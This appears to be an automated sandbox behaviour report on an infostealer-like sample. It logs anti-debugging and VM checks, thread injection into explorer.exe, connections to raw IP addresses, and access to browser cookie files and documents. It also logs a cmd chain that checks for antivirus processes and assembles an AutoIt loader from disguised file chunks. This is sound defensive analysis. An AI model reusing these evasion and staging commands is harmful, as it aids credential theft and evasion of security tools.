Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00C53B4F FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	19_2_00C53B4F
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00C53E72 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	19_2_00C53E72
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_01410730 FindFirstFileW,FindClose,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,	19_2_01410730
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_01410810 FindNextFileW,FindClose,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,	19_2_01410810
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_014FB7D0 _vcomp_for_static_simple_init,GetFileAttributesA,_vcomp_for_static_end,_vcomp_for_static_simple_init,GetFileAttributesA,FindFirstFileW,CreateFileA,GetFileSize,ReadFile,CloseHandle,FindNextFileW,FindClose,_vcomp_for_static_end,	19_2_014FB7D0
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_014F2001 FindFirstFileExW,	19_2_014F2001

Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif

Code function: 19_2_00C05D13 GetVersionExW,GetCurrentProcess,IsWow64Process,FreeLibrary,GetSystemInfo,GetSystemInfo,

19_2_00C05D13

Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif

Thread delayed: delay time: 1200000

Jump to behavior

Source: explorer.exe, 00000002.00000000.2165593335.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0r
Source: explorer.exe, 00000002.00000000.2165593335.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
Source: Later.pif, 00000013.00000003.4146934684.00000000016BB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllLZZDUJIUHYZLUNSOMJMWEUBWYSZMXVDNUGSZBSFDACOIFWETJRIXVPDMSVMTKEKNHJFFXCTPPDKYDXOUOGJAFSXVENTIMFLXNKBWSOIJAZLZTXZGBBMUATMNGOCOLHIAOOTBENXJLNEBPUYZAWEWHZCOBEUXLNOCBFMFNLCFQRYSEURUEVQSEGVPCVNXYOUEBPWYJVBOVZHHSIVQELASLMFLMIGPFTSWZUYAGUCKFCQXXUWMMESTICTHONLUYSPUWOTQKWRRQMUHGZGAAEZOPOKQULFWRPEFDYEONLKPEMDUKCRINZIRUSKDDNYBNBYIIEFYAXNFVFGHEJTHFTUPICAWBETIIANYRONFSQFBHEGJISEQSPFKPRSEZHTQOXRPUKTEUQJYBYNQULHXLSRXNENUVTORORBUHFHDFSRJFILKEVULBILAWPLSQLSOWMKABQ
Source: tmp1721021440_3.19.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: tmp1721021440_3.19.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2159497737.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
Source: tmp1721021440_3.19.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2165593335.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, Later.pif, 00000013.00000003.4121441203.000000000172B000.00000004.00000020.00020000.00000000.sdmp, Later.pif, 00000013.00000002.4561053585.00000000038B5000.00000004.00000020.00020000.00000000.sdmp, Later.pif, 00000013.00000003.4109189873.000000000172B000.00000004.00000020.00020000.00000000.sdmp, Later.pif, 00000013.00000003.4129845181.000000000172B000.00000004.00000020.00020000.00000000.sdmp, Later.pif, 00000013.00000003.4164491400.000000000172A000.00000004.00000020.00020000.00000000.sdmp, Later.pif, 00000013.00000003.4108302557.000000000172B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: tmp1721021440_3.19.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Later.pif, 00000013.00000003.3986742882.000000000167C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW]
Source: Later.pif, 00000013.00000002.4560271483.0000000001668000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllVEWFWOOOGJ
Source: tmp1721021440_3.19.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Later.pif, 00000013.00000003.3986742882.00000000016BC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllocal\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows
Source: Later.pif, 00000013.00000003.3971647939.000000000169A000.00000004.00000020.00020000.00000000.sdmp, Later.pif, 00000013.00000003.3971430000.0000000001689000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWb
Source: Later.pif, 00000013.00000003.4092186003.00000000016CC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllWindows.
Source: explorer.exe, 00000002.00000000.2165593335.0000000009BB1000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: tmp1721021440_3.19.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2165593335.0000000009BB1000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTcaVMWare
Source: tmp1721021440_3.19.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: explorer.exe, 00000002.00000000.2165593335.0000000009BB1000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: tmp1721021440_3.19.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: tmp1721021440_3.19.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: tmp1721021440_3.19.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2163432174.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
Source: tmp1721021440_3.19.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: explorer.exe, 00000002.00000000.2162269436.0000000003554000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
Source: tmp1721021440_3.19.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: explorer.exe, 00000002.00000000.2165593335.0000000009BB1000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
Source: explorer.exe, 00000002.00000000.2165593335.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.2163432174.000000000769A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: tmp1721021440_3.19.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Later.pif, 00000013.00000003.4155490022.00000000016BB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllNOT NULL PRIMARY KEY, relying_party_id VARCHAR NOT NULL, label VARCHAR NOT NULL, icon BLOB NOT NULL, date_created INTEGER NOT NULL DEFAULT 0, user_id BLOB)k+
Source: explorer.exe, 00000002.00000000.2163432174.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
Source: tmp1721021440_3.19.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: explorer.exe, 00000002.00000000.2165593335.0000000009BB1000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.2162269436.0000000003554000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.
Source: tmp1721021440_3.19.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: tmp1721021440_3.19.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: tmp1721021440_3.19.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: tmp1721021440_3.19.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: Later.pif, 00000013.00000003.4107631210.00000000016CF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll,,yPH(i
Source: tmp1721021440_3.19.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: tmp1721021440_3.19.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: tmp1721021440_3.19.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: tmp1721021440_3.19.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: tmp1721021440_3.19.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Later.pif, 00000013.00000002.4560271483.0000000001668000.00000004.00000020.00020000.00000000.sdmp, Later.pif, 00000013.00000003.4165412767.000000000167E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: tmp1721021440_3.19.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: tmp1721021440_3.19.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: tmp1721021440_3.19.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: tmp1721021440_3.19.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2165593335.0000000009BB1000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: tmp1721021440_3.19.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: explorer.exe, 00000002.00000000.2162269436.0000000003554000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware-42 27 d9 2e dc 89 72 dX
Source: tmp1721021440_3.19.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: tmp1721021440_3.19.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2162269436.0000000003554000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware,p
Source: explorer.exe, 00000002.00000000.2165593335.0000000009BB1000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0#{5-
Source: Later.pif, 00000013.00000003.4113726100.000000000167E000.00000004.00000020.00020000.00000000.sdmp, Later.pif, 00000013.00000003.4077208565.0000000001697000.00000004.00000020.00020000.00000000.sdmp, Later.pif, 00000013.00000003.4130104259.0000000001690000.00000004.00000020.00020000.00000000.sdmp, Later.pif, 00000013.00000003.4035066859.000000000167D000.00000004.00000020.00020000.00000000.sdmp, Later.pif, 00000013.00000003.4077591784.00000000016A3000.00000004.00000020.00020000.00000000.sdmp, Later.pif, 00000013.00000003.4165412767.0000000001690000.00000004.00000020.00020000.00000000.sdmp, Later.pif, 00000013.00000003.4146934684.0000000001690000.00000004.00000020.00020000.00000000.sdmp, Later.pif, 00000013.00000003.4034709482.000000000167C000.00000004.00000020.00020000.00000000.sdmp, Later.pif, 00000013.00000002.4560271483.0000000001668000.00000004.00000020.00020000.00000000.sdmp, Later.pif, 00000013.00000003.4155490022.0000000001690000.00000004.00000020.00020000.00000000.sdmp, Later.pif, 00000013.00000003.4038890020.00000000016A3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V ,
Source: tmp1721021440_3.19.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: explorer.exe, 00000002.00000000.2159497737.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Desktop\file.exe	System information queried: CodeIntegrityInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\wjshsfa	System information queried: CodeIntegrityInformation			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Roaming\wjshsfa	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif

Code function: 19_2_00C643B9 BlockInput,

19_2_00C643B9

Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif

Code function: 19_2_00C18DB9 _memset,IsDebuggerPresent,

19_2_00C18DB9

Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif

Code function: 19_2_00C25BDC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

19_2_00C25BDC

Source: C:\Users\user\AppData\Local\Temp\9CFE.exe

Code function: 7_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,

7_2_004062FC

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_021D092B mov eax, dword ptr fs:[00000030h]	0_2_021D092B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_021D0D90 mov eax, dword ptr fs:[00000030h]	0_2_021D0D90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_022A1979 push dword ptr fs:[00000030h]	0_2_022A1979
Source: C:\Users\user\AppData\Roaming\wjshsfa	Code function: 4_2_02151AA9 push dword ptr fs:[00000030h]	4_2_02151AA9
Source: C:\Users\user\AppData\Roaming\wjshsfa	Code function: 4_2_0224092B mov eax, dword ptr fs:[00000030h]	4_2_0224092B
Source: C:\Users\user\AppData\Roaming\wjshsfa	Code function: 4_2_02240D90 mov eax, dword ptr fs:[00000030h]	4_2_02240D90

Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif

Code function: 19_2_00C486B0 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

19_2_00C486B0

Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00C1A284 SetUnhandledExceptionFilter,	19_2_00C1A284
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00C1A2B5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_00C1A2B5
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_014E4DD4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_014E4DD4
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_014D8F1E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	19_2_014D8F1E
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_014D95AC IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_014D95AC

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: 9CFE.exe.2.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 77.221.157.163 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 58.151.148.90 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 127.0.0.127 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 186.101.193.110 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.149.100.242 443	Jump to behavior

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\file.exe	Thread created: C:\Windows\explorer.exe EIP: 12119D0			Jump to behavior
Source: C:\Users\user\AppData\Roaming\wjshsfa	Thread created: unknown EIP: 30419D0			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif

Memory written: C:\Users\user\AppData\Local\Temp\78801\Later.pif base: 1400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\file.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wjshsfa	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wjshsfa	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif

Code function: 19_2_00C4914C LogonUserW,

19_2_00C4914C

Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif

Code function: 19_2_00C05240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

19_2_00C05240

Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif

Code function: 19_2_00C51932 SendInput,keybd_event,

19_2_00C51932

Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif

Code function: 19_2_00C550A7 mouse_event,

19_2_00C550A7

Source: C:\Users\user\AppData\Local\Temp\9CFE.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k copy Beastiality Beastiality.cmd & Beastiality.cmd & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 78801	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "rapidconfidentialityspokedrill" Thanks	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Thanksgiving + Arnold + Daily + Mobiles + Drugs + Log + Shoes + Bd + Representations + Investment + Explore + Submissions + Bosnia + Closing + Supervisors 78801\B	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\78801\Later.pif 78801\Later.pif 78801\B	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 5	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Process created: C:\Users\user\AppData\Local\Temp\78801\Later.pif C:\Users\user\AppData\Local\Temp\78801\Later.pif	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif

19_2_00C486B0

Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif

Code function: 19_2_00C54D89 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

19_2_00C54D89

Source: Later.pif, 00000011.00000000.2887708150.0000000000CA5000.00000002.00000001.01000000.00000007.sdmp, Later.pif, 00000013.00000000.3862943026.0000000000CA5000.00000002.00000001.01000000.00000007.sdmp, Later.pif.8.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: explorer.exe, 00000002.00000000.2165593335.0000000009BB1000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd=
Source: explorer.exe, 00000002.00000000.2161546840.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000002.00000000.2163256982.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2161546840.0000000001731000.00000002.00000001.00040000.00000000.sdmp, Later.pif	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.2161546840.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: 9CFE.exe, 00000007.00000003.2827915033.0000000002841000.00000004.00000020.00020000.00000000.sdmp, Festivals.7.dr	Binary or memory string: cript files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: explorer.exe, 00000002.00000000.2161546840.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000002.00000000.2159497737.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PProgman

Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif

Code function: 19_2_00C1878B cpuid

19_2_00C1878B

Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoW,	19_2_014D83FF
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: RegGetValueW,RegCloseKey,RegEnumKeyW,GetKeyboardLayout,GetLocaleInfoW,GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoW,LocalFree,AllocateAndInitializeSid,CheckTokenMembership,FreeSid,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,	19_2_01418689
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: RegEnumKeyW,GetKeyboardLayout,GetLocaleInfoW,GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,AllocateAndInitializeSid,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,	19_2_01418940
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: EnumSystemLocalesW,	19_2_014EC27C
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: GetLocaleInfoW,	19_2_014EC83F
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	19_2_014F4DA9
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: EnumSystemLocalesW,	19_2_014F513B
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	19_2_014F51C6
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: EnumSystemLocalesW,	19_2_014F5055
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: EnumSystemLocalesW,	19_2_014F50A0
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	19_2_014F5542
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: GetLocaleInfoW,	19_2_014F5419
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	19_2_014F571E
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: GetLocaleInfoW,	19_2_014F5648

Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Queries volume information: C:\Users\user\Desktop\FACWLRWHGG.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Queries volume information: C:\Users\user\Desktop\MQAWXUYAIK.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Queries volume information: C:\Users\user\Desktop\XQACHMZIHU.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Queries volume information: C:\Users\user\Documents\XQACHMZIHU.docx VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif

